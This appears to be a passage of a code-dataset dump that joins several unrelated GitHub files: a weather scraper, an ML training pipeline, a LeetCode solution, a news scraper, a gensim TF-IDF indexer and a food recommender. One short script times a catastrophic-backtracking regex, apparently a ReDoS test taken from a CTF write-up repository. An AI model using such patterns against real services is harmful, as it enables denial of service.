\")\n\nurl = \"https://www.google.com/search?q=\" + \"weather\" + city\nhtml = requests.get(url).content\n\nsoup = BeautifulSoup(html, 'html.parser')\ntemp = soup.find('div', attrs={'class': 'BNeawe iBp4i AP7Wnd'}).text\ntime_sky = soup.find('div', attrs={'class': 'BNeawe tAd8D AP7Wnd'}).text\n\ndata_split = time_sky.split('\\n')\ntime = data_split[0]\nsky = data_split[1]\n\nprint(Fore.BLUE + city.capitalize(),\":\")\nprint(\"Temperature is\", temp)\nprint(\"Today the sky is:\", sky)\nprint(\"Today is\", time)\n\n#issue was here -> \ntemp_digit = temp[:-1]\ntemp_digit = int(temp_digit[:-1])\n\nif 41 <= temp_digit <= 59:\n print(Fore.RED + \"You're going to need a jacket today!\")\n\nelif temp_digit < 41:\n print(\"Maybe you should wear a winter coat instead!\")\n\nelse:\n print(Fore.YELLOW + \"You don't need a jacket today. 
Enjoy the weather!\")\n","repo_name":"hafssarawi/DoYouNeedAJacket22","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"32396071923","text":"\"\"\"\nThis script runs the whole pipeline including training, prediction and performance metrics evaluation\nin k-fold cross-validation.\n\nFile: run_pipeline.py\nAuthor: Jana Rieger\nCreated on: 24.08.2020\n\"\"\"\n\nimport os\nimport pickle\n\nfrom src.RF import rf_config\nfrom src.RF.utils.evaluate_function import evaluate_and_save_to_csv\nfrom src.RF.utils.predict_function import predict_and_save\nfrom src.RF.utils.prepare_samples import get_balanced_samples\nfrom src.RF.utils.train_function import train_and_save\nfrom src.generalutils import helper\nfrom sklearn import preprocessing\n\nprint('run_pipeline.py', os.getcwd())\n\n\ndef main():\n ################################################\n # SET PARAMETERS FOR TUNING\n ################################################\n n_estimators_list = [50, 100] # list of number of trees in forest\n crossvalidation = False\n ################################################\n\n # general parameter\n version = rf_config.RF_VERSION\n models_dir = rf_config.MODELS_DIR\n data_dir = rf_config.DATA_DIR\n feature_names = rf_config.FEATURE_NAMES\n # additional parameters - predicting\n feature_filenames = rf_config.FEATURE_FILENAMES # list of the feature inputs to the network in the right order\n predictions_dir = rf_config.PREDICTIONS_DIR\n # additional parameters - evaluation\n label_filename = rf_config.LABEL_FILENAMES[rf_config.H_LEVEL]\n class_dict = rf_config.CLASS_DICTS[rf_config.H_LEVEL]\n\n print('-' * 100)\n print('version', version)\n print('number of estimators list', n_estimators_list)\n print('crossvalidation', crossvalidation)\n print('*' * 100)\n\n # -----------------------------------------------------------\n # PREPARING MODEL SAMPLES\n # -----------------------------------------------------------\n if crossvalidation:\n # LOADING MODEL DATA\n X, y = get_balanced_samples(feature_names=feature_names)\n folds = helper.load_json(os.path.join('src', 'BRAVENET', 'xval_folds_example.json'))\n for f, fold in folds.items():\n if f not in ['0', '1', '2', '3']:\n continue\n print('FOLD %s' % f)\n datasets = [*fold]\n models_dir = os.path.join(rf_config.MODELS_DIR, 'fold' + str(f))\n predictions_dir = os.path.join(rf_config.PREDICTIONS_DIR, 'fold' + str(f))\n # Get train dfs.\n train_X = X[X['patient_id'].isin(fold['train']['working'])].drop('patient_id', axis=1)\n train_y = y[y['patient_id'].isin(fold['train']['working'])].drop('patient_id', axis=1)\n # Scaling\n scaler = preprocessing.MinMaxScaler().fit(train_X)\n train_X = scaler.transform(train_X)\n # Patient numbers\n n_train_patients = len(fold['train']['working'])\n\n # -----------------------------------------------------------\n # RUNNING PIPELINE\n # -----------------------------------------------------------\n pipeline(n_estimators_list=n_estimators_list, train_X=train_X, train_y=train_y, scaler=scaler,\n class_dict=class_dict, datasets=datasets, predictions_dir=predictions_dir, models_dir=models_dir,\n data_dir=data_dir, version=version, feature_filenames=feature_filenames,\n label_filename=label_filename, patients=fold, n_train_patients=n_train_patients)\n else:\n # LOADING MODEL DATA\n patients = rf_config.PATIENTS\n datasets = ['train', 'val', 'test']\n X, y = 
get_balanced_samples(feature_names=feature_names)\n # Get train dfs\n train_X = X[X['patient_id'].isin(patients['train']['working'])].drop('patient_id', axis=1)\n train_y = y[y['patient_id'].isin(patients['train']['working'])].drop('patient_id', axis=1)\n # Scaling\n scaler = preprocessing.MinMaxScaler().fit(train_X)\n train_X = scaler.transform(train_X)\n # Patient numbers\n n_train_patients = len(patients['train']['working'])\n\n # -----------------------------------------------------------\n # RUNNING PIPELINE\n # -----------------------------------------------------------\n pipeline(n_estimators_list=n_estimators_list, train_X=train_X, train_y=train_y, scaler=scaler,\n class_dict=class_dict, datasets=datasets, predictions_dir=predictions_dir, models_dir=models_dir,\n data_dir=data_dir, version=version, feature_filenames=feature_filenames,\n label_filename=label_filename, patients=patients, n_train_patients=n_train_patients)\n print('DONE')\n\n\ndef pipeline(n_estimators_list, train_X, train_y, scaler, class_dict, datasets, predictions_dir, models_dir, data_dir,\n version, feature_filenames, label_filename, patients, n_train_patients):\n # -----------------------------------------------------------\n # PREPARE FILES FOR STORING RESULTS\n # -----------------------------------------------------------\n all_classes = [*class_dict]\n all_classes = list(map(str, all_classes))\n result_files_dict = {}\n for dataset in datasets:\n if not os.path.exists(os.path.join(predictions_dir, dataset)):\n os.makedirs(os.path.join(predictions_dir, dataset))\n result_file = rf_config.get_complete_result_table_filepath(predictions_dir, dataset)\n result_file_per_patient = rf_config.get_complete_result_table_per_patient_filepath(predictions_dir, dataset)\n header_row = ['number of estimators',\n 'num pat ' + dataset, 'value',\n 'acc ' + dataset,\n 'dice macro ' + dataset,\n 'dice macro wo 0 ' + dataset,\n 'dice macro wo 0 and 1 ' + dataset,\n 'avg acc ' + dataset,\n 'avg acc wo 0 ' + dataset,\n 'avg acc wo 0 and 1 ' + dataset,\n 'dice binary ' + dataset] + all_classes\n header_row_patient = ['number of estimators',\n 'patient',\n 'acc ' + dataset,\n 'dice macro ' + dataset,\n 'dice macro wo 0 ' + dataset,\n 'dice macro wo 0 and 1 ' + dataset,\n 'avg acc ' + dataset,\n 'avg acc wo 0 ' + dataset,\n 'avg acc wo 0 and 1 ' + dataset,\n 'dice binary ' + dataset] + all_classes\n helper.write_to_csv(result_file, [header_row])\n helper.write_to_csv(result_file_per_patient, [header_row_patient])\n result_files_dict[dataset] = [result_file, result_file_per_patient]\n\n # -----------------------------------------------------------\n # FINE GRID FOR PARAMETER TUNING\n # -----------------------------------------------------------\n for n_estimators in n_estimators_list:\n run_name = rf_config.get_run_name(version=version, n_estimators=n_estimators,\n n_patients_train=n_train_patients)\n train_metadata_filepath = rf_config.get_train_metadata_filepath(models_dir, run_name)\n model_filepath = rf_config.get_model_filepath(models_dir, run_name)\n # -----------------------------------------------------------\n # TRAIN RF AND SAVE MODEL AND RESULTS\n # -----------------------------------------------------------\n train_and_save(version, models_dir, n_estimators=n_estimators,\n n_train_patients=n_train_patients,\n train_X=train_X, train_y=train_y,\n scaler=scaler, run_name=run_name, train_metadata_filepath=train_metadata_filepath,\n model_filepath=model_filepath)\n print('_' * 100)\n print('Training completed.')\n print('_' * 
100)\n # -----------------------------------------------------------\n # PREDICT AND EVALUATE\n # -----------------------------------------------------------\n print('Starting prediction...')\n print('_' * 100)\n train_metadata = helper.load_model_metadata(train_metadata_filepath)\n model = pickle.load(open(model_filepath, 'rb'))\n for dataset in datasets:\n print('DATASET', dataset)\n set_patients = patients[dataset]['working']\n for patient in set_patients:\n print('-' * 100)\n predict_and_save(version=version, n_estimators=n_estimators,\n n_patients_train=n_train_patients, patient=patient,\n data_dir=data_dir, dataset=dataset,\n feature_filenames=feature_filenames,\n models_dir=models_dir, predictions_dir=predictions_dir, run_name=run_name,\n model=model, train_metadata=train_metadata)\n print('_' * 100)\n print('Prediction in %s dataset completed.' % dataset)\n print('_' * 100)\n # -----------------------------------------------------------\n # EVALUATE\n # -----------------------------------------------------------\n print('Starting evaluation in %s dataset...' % dataset)\n print('_' * 100)\n evaluate_and_save_to_csv(version=version, n_estimators=n_estimators,\n n_patients_train=n_train_patients, data_dir=data_dir,\n dataset=dataset,\n models_dir=models_dir, predictions_dir=predictions_dir,\n patients=set_patients, result_file=result_files_dict[dataset][0],\n result_file_per_patient=result_files_dict[dataset][1],\n label_load_name=label_filename, washed=False)\n print('_' * 100)\n print('Evaluation in %s dataset completed.' % dataset)\n print('_' * 100)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jana-rieger/vessel_annotation","sub_path":"src/RF/run_pipeline.py","file_name":"run_pipeline.py","file_ext":"py","file_size_in_byte":10127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25621471111","text":"from operator import pos\nfrom typing import List\n\n\nclass Solution:\n def oddEvenJumps(self, arr: List[int]) -> int:\n n = len(arr)\n next_larger = [-1 for i in range(n)]\n next_smaller = [-1 for i in range(n)]\n\n data = sorted([[a, i] for i, a in enumerate(arr)],\n key=lambda x: [x[0], x[1]])\n stack = []\n next_larger[n-1], next_smaller[n-1] = n-1, n-1\n for i in range(n):\n while stack and data[i][1] > stack[-1]:\n next_larger[stack.pop()] = data[i][1]\n stack.append(data[i][1])\n\n data = sorted([[a, i] for i, a in enumerate(arr)],\n key=lambda x: [-x[0], x[1]])\n stack = []\n for i in range(n):\n while stack and data[i][1] > stack[-1]:\n next_smaller[stack.pop()] = data[i][1]\n stack.append(data[i][1])\n\n dp = [[True for i in range(n)] for j in range(2)]\n result = 1\n for i in range(n-2, -1, -1):\n if next_larger[i] == -1:\n dp[0][i] = False\n else:\n dp[0][i] = dp[1][next_larger[i]]\n if dp[0][i]:\n result += 1\n if next_smaller[i] == -1:\n dp[1][i] = False\n else:\n dp[1][i] = dp[0][next_smaller[i]]\n return result\n\n\nprint(Solution().oddEvenJumps(\n [2, 3, 1, 1, 4]), 2)\n","repo_name":"HandsomeCoder/leetcode-practice","sub_path":"google/odd-even-jump.py","file_name":"odd-even-jump.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39078180063","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.wait import 
WebDriverWait\r\nfrom selenium.webdriver.support.expected_conditions import presence_of_element_located\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom time import sleep\r\nimport bs4\r\nimport requests\r\nimport json\r\n\r\n\r\n# setting up the webdriver\r\ndriver=webdriver.Chrome('E:\\My_projects\\web scraping\\chromedriver.exe')\r\ndriver.get(\"https://www.alchourouk.com/%D8%A7%D9%84%D8%B1%D8%A6%D9%8A%D8%B3%D9%8A%D8%A9\")\r\n\r\n# list of the topics we want to scrape (politics, national, our regions, sports)\r\nl=[\"سياسة\",\"وطنية\",\"جهاتنا\",\"رياضة\"]\r\n\r\n# generate a BeautifulSoup object for the given url\r\ndef create_soup(url):\r\n page = requests.get(url)\r\n soup = bs4.BeautifulSoup(page.content, \"html.parser\")\r\n return soup\r\n\r\n# get the news item from the provided url\r\ndef get_event(url):\r\n page = create_soup(url)\r\n events = page.find_all(class_=\"field field--name-body field--type-text-with-summary field--label-hidden field--item\")\r\n event = events[4].text.strip()\r\n return event \r\n\r\n# save the scraped news items to the output dict\r\ndef collect_all_data(li,key_word,out_data):\r\n out_data[key_word]=dict()\r\n for i in range(len(li)):\r\n out_data[key_word][i+1]=get_event(li[i])\r\n\r\n\r\n# open the page for the given keyword, then collect the links of the news items to scrape later\r\ndef collect_data_from_one_page(key_word,out_data):\r\n out=set()\r\n link=driver.find_element_by_link_text(key_word)\r\n link.click()\r\n sleep(5)\r\n print(key_word+\"\\n\\n\")\r\n elems = driver.find_elements_by_css_selector(\".fieldset [href]\")\r\n links = [elem.get_attribute('href') for elem in elems]\r\n for li in links:\r\n out.add(li)\r\n driver.back()\r\n sleep(2)\r\n li=list(out)\r\n collect_all_data(li,key_word,out_data)\r\n\r\n\r\n# scrape all data\r\ndef scrape(l):\r\n out_data = dict()\r\n for key_word in l:\r\n collect_data_from_one_page(key_word,out_data)\r\n \r\n return out_data\r\n\r\n\r\nif __name__==\"__main__\":\r\n out_data=scrape(l)\r\n data_file = open(\"data.json\", \"w\")\r\n json.dump(out_data, data_file, ensure_ascii=False)\r\n data_file.close()\r\n\r\n","repo_name":"fawzeus/alshourouk-scrapper","sub_path":"app/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"70444039192","text":"# def oddEven(A,Odd,Even):\n# for i in A : \n# if (i%2==0):\n# Even.append(i)\n# else:\n# Odd.append(i)\n\nOdd =list()\nEven = list() #even=[]\nX = [1,2,3,4,5,6,7,8,9]\nfor i in X: \n if (i%2==0):\n Even.append(i)\n else:\n Odd.append(i)\n\nprint(Odd)\nprint(Even)\n\n# class MyClass:\n# a = 6 \n# b = 2 \n# c = 4 \n\n# print(a+b+c)","repo_name":"Mudit2003/Coding","sub_path":"Python/OddEven.py","file_name":"OddEven.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41418361706","text":"import bz2\nimport os\nimport jsonlines\nimport pickle\nimport typing as t\nfrom pathlib import Path\n\nfrom gensim import utils\nfrom gensim.corpora import Dictionary\nfrom gensim.corpora.mmcorpus import MmCorpus\nfrom gensim.models import TfidfModel\nfrom gensim.parsing.preprocessing import PorterStemmer\nfrom tqdm import tqdm\n\nfrom medical_ir.config import (\n BIOPAPERS_JSON_PATH,\n BOW_PATH,\n DATA_FOLDER,\n TFIDF_VECTORIZER,\n INDECES_FOLDER,\n DEFAULT_STOPWORDS,\n BIOPAPERS_WOUT_ABSTRACT_JSON_PATH,\n BIOPAPERS_W_ABSTRACT_JSON_PATH,\n BOW_LENGTH,\n)\nfrom medical_ir.config import (\n spaces,\n num_alpha,\n alpha_num,\n non_letters,\n numbers,\n 
html_tags,\n punctuation,\n)\n\np = PorterStemmer()\n\n\ndef clean_and_tokenize_text(input_corpus: str, min_len: int = 3) -> t.List[str]:\n \"\"\"\n Inspiration from gensim preprocess_text with the addition of medical stop words\n\n Parameters\n ----------\n input_corpus: str\n Input string to be tokenized\n\n Returns\n -------\n s_tokens: list\n List of stemmed tokens\n \"\"\"\n s = input_corpus.lower()\n s = utils.to_unicode(s)\n # Remove HTML Tags\n s = html_tags.sub(\"\", s)\n # Remove punctuation:\n s = punctuation.sub(\"\", s)\n # Remove non-letters:\n s = non_letters.sub(\" \", s)\n # Remove digits in letters:\n s = alpha_num.sub(\" \", s)\n s = num_alpha.sub(\" \", s)\n # Remove white space:\n s = spaces.sub(\" \", s)\n # Remove numbers:\n s = numbers.sub(\"\", s)\n # Remove stopwords and small words:\n s_tokens = []\n for curr_word in s.split(\" \"):\n if curr_word not in DEFAULT_STOPWORDS:\n if len(curr_word) >= min_len:\n s_tokens.append(p.stem(curr_word))\n\n return s_tokens\n\n\nclass BiopapersCorpus:\n def __init__(\n self,\n bow_dictionary: Dictionary,\n path_to_JSONL_index: Path,\n tfidf_vectorizer: t.Union[TfidfModel, None] = None,\n metadata_index_outpath: t.Union[Path, None] = None,\n ):\n self.bow_dictionary = bow_dictionary\n self.index_path = path_to_JSONL_index\n self.tfidf_vectorizer = tfidf_vectorizer\n self.metadata_index_outpath = metadata_index_outpath\n # Initialize id count to 0\n self.count_doc_id = 0\n\n def __iter__(self):\n for json_line in tqdm(\n jsonlines.open(self.index_path), f\"Iterating through corpora {self.index_path}\"\n ):\n # Initialize empty abstract and title:\n abstract = \"\"\n title = \"\"\n # Check if title and abstracts are available:\n if json_line[\"title\"]:\n title = json_line[\"title\"]\n if json_line[\"abstract\"]:\n abstract = json_line[\"abstract\"]\n # Add abstract and title together\n title_abstract_str = title + \" \" + abstract\n tokens_list = clean_and_tokenize_text(title_abstract_str)\n # If Vectorization mode on:\n if self.tfidf_vectorizer:\n # If file for indexing was given:\n if self.metadata_index_outpath:\n # Extract relevant info:\n doi = json_line[\"doi\"]\n title = json_line[\"title\"]\n url = json_line[\"doi_url\"]\n journal = json_line[\"journal_name\"]\n authors_dict = json_line[\"z_authors\"]\n year = json_line[\"year\"]\n # Add metadata to dictionary\n metadata_dict = {\n self.count_doc_id: {\n \"doi\": doi,\n \"title\": title,\n \"url\": url,\n \"journal\": journal,\n \"authors\": authors_dict,\n \"year\": year,\n }\n }\n # Create key in gz pickle file:\n with jsonlines.open(self.metadata_index_outpath, \"a\") as outfile:\n outfile.write(metadata_dict)\n # Increasing count:\n self.count_doc_id += 1\n # Convert BOW corpus to TFIDF:\n yield self.tfidf_vectorizer[self.bow_dictionary.doc2bow(tokens_list)]\n # Else we are converting to BOW:\n else:\n yield self.bow_dictionary.doc2bow(tokens_list)\n\n\nclass BiopapersBOW:\n \"\"\"\n Intelligent implementation of corpora which opens one document at the time\n \"\"\"\n\n def __init__(self, path_to_JSONL_index: Path):\n self.index_path = path_to_JSONL_index\n\n def __iter__(self):\n for json_line in jsonlines.open(self.index_path):\n # Initialize empty abstract and title:\n abstract = \"\"\n title = \"\"\n # Check if title and abstracts are available:\n if json_line[\"title\"]:\n title = json_line[\"title\"]\n if json_line[\"abstract\"]:\n abstract = json_line[\"abstract\"]\n # Add abstract and title together\n title_abstract_str = title + \" \" + abstract\n # Clean 
text:\n tokens_list = clean_and_tokenize_text(title_abstract_str)\n # Create a dictionary\n yield Dictionary([tokens_list])\n\n\ndef create_bow_from_biopapers(\n no_below: int = 2,\n no_above: float = 0.5,\n path_to_jsonl_index: Path = BIOPAPERS_JSON_PATH,\n outfile: Path = BOW_PATH,\n keep_n: int = BOW_LENGTH,\n prune_at_idx: int = 100000,\n) -> Dictionary:\n \"\"\"\n Create bag of words dictionary from jsonl biopapers\n\n Parameters\n ----------\n no_below: int\n Minimum number of appearances of a word\n no_above: float\n Max frequency of a word\n path_to_jsonl_index: Path\n Path to jsonlines papers\n outfile: Path\n Path to bow file\n prune_at_idx: int\n Index multiple at which to prune the dictionary. Eg. if prune_at_idx the\n index will be pruned at 1000, 2000, 3000 and so on.\n\n Returns\n -------\n collection_dictionary: Dictionary\n Gensim Bow dictionary\n \"\"\"\n # Initialize variables:\n biopapers_iter = BiopapersBOW(path_to_jsonl_index)\n collection_dictionary = dict()\n # Iterate through collection and build vocabulary\n for i, paper_vocabulary in enumerate(\n tqdm(biopapers_iter, desc=\"Building bag of words\")\n ):\n # If first paper:\n if i == 0:\n collection_dictionary = paper_vocabulary\n else:\n collection_dictionary.merge_with(paper_vocabulary)\n if i % prune_at_idx == 0:\n # Filter words:\n collection_dictionary.filter_extremes(no_below=1, no_above=no_above, keep_n=keep_n*2)\n # Final Filter words:\n collection_dictionary.filter_extremes(no_below=no_below, no_above=no_above, keep_n=keep_n)\n # Save collection to file:\n collection_dictionary.save(str(outfile))\n\n return collection_dictionary\n\n\ndef create_tfidf_from_papers(\n path_to_jsonl_index: Path = BIOPAPERS_JSON_PATH,\n path_to_bow: Path = BOW_PATH,\n outfile: Path = TFIDF_VECTORIZER,\n) -> TfidfModel:\n \"\"\"\n Creates TFIDF model from BOW corpora.\n\n Parameters\n ----------\n path_to_jsonl_index: Path\n Path to json lines index\n path_to_bow: Path\n Path to Bag of Words Dictionary\n outfile: Path\n Path to TFIDF vectorizer\n\n Returns\n -------\n tfidf_model: TfidfModel\n Gensim TFIDF Model\n \"\"\"\n # Load dictionary\n dictionary = Dictionary.load(str(path_to_bow))\n # Load corpus generator\n corpus = BiopapersCorpus(dictionary, path_to_jsonl_index)\n # Train TFIDF\n tfidf_model = TfidfModel(corpus)\n # Save TFIDF model to file:\n tfidf_model.save(str(outfile))\n\n return tfidf_model\n\n\ndef convert_corpus_to_sparse_tfidf(\n metadata_index_outpath: Path,\n vectorized_corpus_outpath: Path,\n path_to_jsonl_index: Path = BIOPAPERS_JSON_PATH,\n path_to_bow: Path = BOW_PATH,\n tfidf_vectorizer: Path = TFIDF_VECTORIZER,\n):\n \"\"\"\n Convert corpora of a specific category into a tfidf sparse matrix.\n\n It saves:\n 1. MM Corpus sparse matrix indexed by id\n 2. 
metadata index as gz pickle file.\n\n Parameters\n ----------\n metadata_index_outpath: Path\n Path to metadata index (without extension)\n vectorized_corpus_outpath: Path\n Path to corpus matrix, does not require extension\n path_to_jsonl_index: Path\n Path to jsonl_index for that specific category\n path_to_bow: Path\n Path to BOW dictionary\n tfidf_vectorizer:\n Path to TFIDF model for vectorization of BOW corpus\n \"\"\"\n # Load dictionary\n if path_to_bow.exists():\n bow_dictionary = Dictionary.load(str(path_to_bow))\n else:\n bow_dictionary = create_bow_from_biopapers()\n # Load tfidf model:\n if tfidf_vectorizer.exists():\n tfidf_model = TfidfModel.load(str(tfidf_vectorizer))\n else:\n tfidf_model = create_tfidf_from_papers()\n # Add pickle suffix:\n metadata_index_outpath = metadata_index_outpath.with_suffix(\".jsonl\")\n # Load corpus generator:\n tfidf_corpus = BiopapersCorpus(\n bow_dictionary=bow_dictionary,\n path_to_JSONL_index=path_to_jsonl_index,\n tfidf_vectorizer=tfidf_model,\n metadata_index_outpath=metadata_index_outpath,\n )\n # Save corpus and index to file:\n MmCorpus.serialize(str(vectorized_corpus_outpath), tfidf_corpus)\n # Convert Jsonlines to pickle bz2\n # convert_jsonl_to_pickle_bz(metadata_index_outpath)\n\n\ndef convert_jsonl_to_pickle_bz(jsonl_path: Path, delete_jsonl: bool = True):\n \"\"\"\n Converts jsonl metadata to pickle bz and optionally removes the original file.\n\n Parameters\n ----------\n jsonl_path: Path\n Path to Jsonlines metadata\n delete_jsonl: Bool\n Whether to delete the jsonlines file after the conversion. Default = True\n \"\"\"\n pkl_bz_outfile = jsonl_path.with_suffix(\".bz2\")\n metadata_dict = {}\n # Open jsonlines and update dictionary:\n with jsonlines.open(jsonl_path) as reader:\n for i, metadata_obj in enumerate(tqdm(reader, desc=f\"Building metadata {pkl_bz_outfile}\"),):\n if i == 0:\n metadata_dict = dict(metadata_obj)\n else:\n metadata_dict = {**metadata_dict, **dict(metadata_obj)}\n # TODO this stalls for large files above 4GB\n # Write pickle to compressed BZ2:\n with bz2.BZ2File(pkl_bz_outfile, \"wb\") as writer:\n pickle.dump(metadata_dict, writer, pickle.HIGHEST_PROTOCOL)\n\n # Remove Jsonlines file\n if delete_jsonl:\n try:\n os.remove(jsonl_path)\n except:\n print(\"Failed to delete Jsonlines file.\")\n\n\ndef convert_indeces_to_tfidf(indeces_folder: Path = INDECES_FOLDER):\n # Obtain list of all indeces:\n index_list = list(indeces_folder.rglob(\"index_*\"))\n # For index path\n for index_path in index_list:\n category = str(index_path.stem).split(\"index_\")[-1]\n metadata_outpath = indeces_folder / f\"{category}_metadata\"\n corpus_outpath = indeces_folder / f\"{category}_corpus.mm\"\n\n convert_corpus_to_sparse_tfidf(\n metadata_index_outpath=metadata_outpath,\n vectorized_corpus_outpath=corpus_outpath,\n path_to_jsonl_index=index_path,\n )\n\ndef convert_str_to_tfidf(\n input_str: str,\n path_to_bow: Path = BOW_PATH,\n tfidf_vectorizer: Path = TFIDF_VECTORIZER,\n) -> (list, int):\n \"\"\"\n Converts a string to bow and then to tfidf\n\n Parameters\n ----------\n input_str: str\n String to be converted. eg. 
from query\n path_to_bow: Path\n Path to BOW dictionary\n tfidf_vectorizer:\n Path to TFIDF model for vectorization of BOW corpus\n\n Returns\n -------\n tfidf_query: list\n List of vectorized tokens and relative tfidf value.\n bow_len: int\n Integer representing the length of the bow dictionary.\n\n \"\"\"\n # Load dictionary\n if path_to_bow.exists():\n bow_dictionary = Dictionary.load(str(path_to_bow))\n else:\n bow_dictionary = create_bow_from_biopapers()\n # Load tfidf model:\n if tfidf_vectorizer.exists():\n tfidf_model = TfidfModel.load(str(tfidf_vectorizer))\n else:\n tfidf_model = create_tfidf_from_papers()\n # Tokenize query:\n query_tokens = clean_and_tokenize_text(input_str)\n # Convert query to bow:\n query_bow = bow_dictionary.doc2bow(query_tokens)\n # Convert bow query to Tfidf:\n tfidf_query = tfidf_model[query_bow]\n\n return tfidf_query, len(bow_dictionary)\n\n\nif __name__ == \"__main__\":\n convert_indeces_to_tfidf()\n","repo_name":"universvm/MediSia","sub_path":"django_backend/medical_ir/index/tfidf_vectorizer.py","file_name":"tfidf_vectorizer.py","file_ext":"py","file_size_in_byte":12694,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"794538345","text":"import re\nimport time\n\nregex = r'([a-z]+)\\1{50}'\nstring = 'abcdefghijklmnopqrstuvwxyz' * 30000\n\nstart_time = time.time()\nmatch = re.match(regex, string)\nend_time = time.time()\n\nduration = end_time - start_time\nprint(f\"Matching duration: {duration:.4f} seconds\")\n","repo_name":"Walid-Berrouk/BSides_Algiers2k23_Write-Ups","sub_path":"web/Flags_Shop/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"6197720862","text":"from unittest import result\nimport pandas as pd\nfrom app.model.user import User\nfrom app.model.rekomendasi import Rekomendasi\nfrom app.model.makanan import Makanan\nfrom app.module import makanancontroller\nimport csv\nfrom app import response, app, db\nfrom flask import request, render_template, redirect, url_for\nimport numpy as np\nfrom ast import literal_eval\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom nltk.corpus import stopwords\nimport re\nimport random\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk import word_tokenize\nfrom nltk.stem import PorterStemmer\nfrom nltk.stem import WordNetLemmatizer\n\n\nclean_spcl = re.compile('[/(){}\\[\\]\\|@,;]')\nclean_symbol = re.compile('[^0-9a-z #+_]')\nstopworda = set(stopwords.words('indonesian'))\n\ndef clean_text(text):\n text = text.lower() # lowercase text\n #text = clean_spcl.sub(' ', text)\n #text = clean_symbol.sub('', text)\n #text = [item.strip() for item in text.split(\",\")]\n text = ' '.join(word for word in text.split() if word not in stopworda) # hapus stopword\n return text\n\ndef clean_split(text):\n text = text.strip()\n text = text.lower().split(', ')\n return text\n\n\ndef preprocessing(pref_bahan, df_u, df_user):\n #Preprocessing preferensi bahan\n #pref_bahan_clean = clean_text_series(df_u['pref_bahan'])\n input = pref_bahan\n clean = [item.strip() for item in input.split(\",\")]\n print(\"ini clean:\",clean)\n combined = [item.replace(\" \",\"\") for item in clean]\n print(\"ini combined:\",combined)\n print(type(combined))\n combined = ', '.join(map(lambda x: \"'\" + x + \"'\", combined))\n print(\"ini combined quoted:\",combined)\n 
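# NOTE (editor's addition, not original code): at this point 'combined' holds the\n    # user's preferred ingredients as quoted, comma-separated tokens (the example\n    # values below are hypothetical), e.g. \"'ayam', 'bawang'\" -- the same format as\n    # the 'bahan_stemmed' column that the TF-IDF step matches it against.\n    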
print(type(combined))\n # Buat kolom tambahan untuk data description yang telah dibersihkan \n df2 = [{'nama_makanan': 'preferensi user', 'energi': 0, 'protein': 0, 'lemak': 0, 'karbo': 0, 'natrium': 0,'bahan_bahan':'', 'bahan_stemmed': combined, 'langkah':''}]\n print(df2)\n df_user = df_user.append(df2, ignore_index = True)\n print(df_user)\n return df_user\n\n\ndef tfidf_func(df_user):\n # PROSES TF - IDF\n #tf = TfidfVectorizer(analyzer='word', ngram_range=(1, 3), min_df=0, stop_words='indonesian')\n tf = TfidfVectorizer(analyzer='word', ngram_range=(1,1), min_df=0, binary=True)\n tfidf_matrix = tf.fit_transform(df_user['bahan_stemmed'])\n return tfidf_matrix\n\n\ndef cossim_func(tfidf_matrix):\n # PROSES SIMILARITY\n cos_sim = cosine_similarity(tfidf_matrix, tfidf_matrix)\n return cos_sim\n\n\ndef recommendation_result(pref_preprocessing, cosine_sim = cossim_func):\n # Set nama makanan sebagai index\n #df_user.set_index('nama_makanan', inplace=True)\n indices = pd.Series(pref_preprocessing.index,index=pref_preprocessing['nama_makanan']).drop_duplicates()\n\n #locate nama makanan\n #idx = indices[indices == 'preferensi user'].index[0]\n idx = indices['preferensi user']\n\n #do tfidf\n tfidf_matrix = tfidf_func(pref_preprocessing)\n\n #do cosine similarity\n cos_sim = cossim_func(tfidf_matrix)\n\n #do cosine similarity to the user's preference\n sim_scores = enumerate(cos_sim[idx])\n\n #sort based on the highest similarity score\n sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)\n print(\"ini isi sim_scores: \")\n print(sim_scores)\n print(type(sim_scores))\n print (\"Number of items in the list = \", len(sim_scores))\n print(\"print nonzero:\", np.count_nonzero(sim_scores, axis=0))\n\n #get top 5 recommendations without the user's preference (without score = 1)\n sim_scores = sim_scores[1:7]\n for i in sim_scores:\n print(i)\n sim_index = [i[0] for i in sim_scores]\n print(\"ini isi sim_index:\")\n print(sim_index)\n print(\"ini isi recommended_food:\")\n print(pref_preprocessing['nama_makanan'].iloc[sim_index])\n #recommended_food = print(pref_preprocessing['nama_makanan'].iloc[sim_index])\n recommended_food = pref_preprocessing['nama_makanan'].iloc[sim_index]\n data = {'Nama Makanan':recommended_food,\n 'Energi':pref_preprocessing['energi'].iloc[sim_index],\n 'Protein':pref_preprocessing['protein'].iloc[sim_index],\n 'Lemak':pref_preprocessing['lemak'].iloc[sim_index],\n 'Karbo':pref_preprocessing['karbo'].iloc[sim_index],\n 'Natrium':pref_preprocessing['natrium'].iloc[sim_index],\n 'Bahan - bahan':pref_preprocessing['bahan_bahan'].iloc[sim_index],\n 'Langkah':pref_preprocessing['langkah'].iloc[sim_index],\n 'Pagi':pref_preprocessing['pagi'].iloc[sim_index],\n 